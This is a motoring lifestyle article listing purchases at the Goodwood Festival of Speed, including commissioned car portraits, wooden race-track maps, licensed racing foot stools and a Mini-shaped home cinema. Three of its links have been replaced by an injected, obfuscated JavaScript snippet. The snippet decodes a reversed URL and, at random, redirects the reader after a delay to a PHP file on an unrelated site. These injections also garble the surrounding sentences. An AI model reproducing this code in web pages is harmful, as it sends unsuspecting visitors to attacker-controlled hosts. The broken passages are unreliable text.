Goodwood Festival of Speed. How to spend all your money

What to spend your hard-earned cash on at the Goodwood Festival of Speed. Apart from cars, obviously.

But it’s also a brilliant place to blow your monthly salary on consumer goods. With that in mind, here’s a brief snapshot of some of the most interesting things to spend your money on.

A commissioned portrait of your car

Neil Podbery is an artist. A fine artist, in fact – it says so on his card. But more than that, he specialises in portraits of cars, often by commission from their owners. When we visit him, he’s in the middle of working on a painting of a 1934 Alfa Romeo 8C 2300 LM Spider, winner of the 1934 24 Hours of Le Mans, and as displayed at last year’s $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/lifestyle/windsor-concours-of-elegance-a-very-british-car-show”>Windsor Concours of Elegance. It’s been commissioned by the owner’s wife as a surprise, so let’s hope he’s not spotted this post.

“I’m not a petrolhead myself, but I’m really driven by detail, so mechanical subjects always have that technical quality that you’ve got to get right. Personally, I like pre-war cars because a lot of the mechanics are on the outside. How long I spend on a portrait varies, but it’ll be from 60 hours to 300 hours, depending on size and complexity.”

Neil also sells prints of his work for around $150. If you fancy commissioning him to paint your jalopy, get some good photos for him to work by and have a budget of $3000-$12,000, depending on size.

A wooden map of your favourite race track

This awesome wall hanging of Suzuka was on sale in the Gearbox Gifts tent at Goodwood, but it’s made by a company called Linear Edge in the US. They do plenty of the world’s favourite race tracks in Baltic birch with black laminate, including $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/?s=yas+marina” target=”_blank”>Yas Marina Circuit in Abu Dhabi, with prices starting at $140. But throw enough money at them and they’ll do a custom one for you. Which is great for all of you wanting a wall display showing the intricacies of the $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/on-the-road/the-management-fleet-chevrolet-sonic-the-15000-challenge-part-one/” target=”_blank”>Al Ain Raceway kart track.

Racing foot stools

We’ve covered the works of Vintage 60 before, but now we’ve had a chance to see their projects up close, and they’re awesome. The British firm produces licensed products from a huge range of race teams, and turns them into foot stools, bar stools, Chubb chairs, golf bags and coffee tables. Among the most impressive are the new McLaren stools, which include replicas of the F1 car’s chassis plate on the side.

“We brought down five or ten designs to the Festival last year, and got an amazing response,” said company boss Lincoln Chillman. “So in the last year we’ve spent the time designing and gaining official licences, with teams such as McLaren, Force India, Williams, Caterham, Tyrrell, Gulf, BP, Castrol and Shell. They come in both vinyl and leather.

“They appeal to everyone from the motoring enthusiast that recognises the racing colours and numbers, to people buying stools for their kids and companies that buy them for their offices. I seem them more as pieces of art rather than just a foot stool. We’ve got about 60 different designs now and we turn orders around in about two weeks.”

Fancy one? Prices for foot stools start at around $600.

A home cinema in a Mini

Don’t be fooled – this may initially look like a genuine Mini, but it’s actually a set of two sofas with an integrated home cinema system. And yes, it would look good in your front room, wouldn’t it?

This rather wicked set up is the collaborative work of two companies. Art Rebellion, the firm of pop artist George Ioannou, makes the furniture from scratch – not from a real Mini. And ASi is a home cinema company that integrates 5.1 surround sound speakers and the television into the sculpted furniture. Fully automated, of course, and controlled by an iPad.

If you fancy a set up as found on the Art Rebellion stand above, with two chairs and a Panasonic TV, make out a cheque for just north of $25,000.
